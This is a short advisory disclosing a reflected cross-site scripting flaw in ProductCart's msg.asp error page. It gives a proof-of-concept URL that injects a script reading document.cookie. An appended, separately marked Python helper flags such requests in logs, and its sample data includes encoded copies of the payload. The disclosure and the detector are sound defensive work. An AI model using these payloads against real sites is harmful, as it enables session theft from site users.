#####################
# ProductCart XSS   #
# Vulnerability     #
# found by atomix   #
#####################

I came across the fact that in an area of ProductCart you are able to manipulate the error message, therefore allowing tags such as <script> and <iframe> to be used:

http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert (document.cookie);</script>

http://www.website.com/ProductCart/pc/msg.asp?message=
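
Added example (not part of the original advisory, and not ProductCart code): a log-review helper that flags requests to msg.asp whose message parameter decodes to HTML markup, as described above. The function names, the other.asp path and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Opening or closing HTML tag; group 1 is the tag name.
TAG = re.compile(r"<\s*/?\s*([a-z][a-z0-9]*)", re.IGNORECASE)

def markup_in_message(target, page="/pc/msg.asp", param="message"):
    """Return decoded 'message' values containing angle brackets.

    ASP treats paths and query-string keys case-insensitively, so both
    are compared in lower case. parse_qsl performs the URL decoding.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith(page):
        return []
    return [value
            for key, value in parse_qsl(parts.query, keep_blank_values=True)
            if key.lower() == param and ("<" in value or ">" in value)]

def scan(targets):
    """Map each flagged request target to the tag names found in it."""
    findings = {}
    for target in targets:
        values = markup_in_message(target)
        if values:
            names = {m.lower() for v in values for m in TAG.findall(v)}
            findings[target] = sorted(names)
    return findings

# Constructed request targets (not taken from real logs).
SAMPLE_TARGETS = [
    "/ProductCart/pc/msg.asp?message=Your+cart+is+empty",
    "/ProductCart/pc/msg.asp?message=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "/ProductCart/pc/MSG.ASP?Message=%3Ciframe%3E",
    "/ProductCart/pc/other.asp?message=%3Cb%3E",  # hypothetical other page
]

if __name__ == "__main__":
    for target, tags in scan(SAMPLE_TARGETS).items():
        print(target, "->", tags)
```

A plain-text error message never needs angle brackets, so any hit here is worth reviewing alongside the referrer and client address of the request.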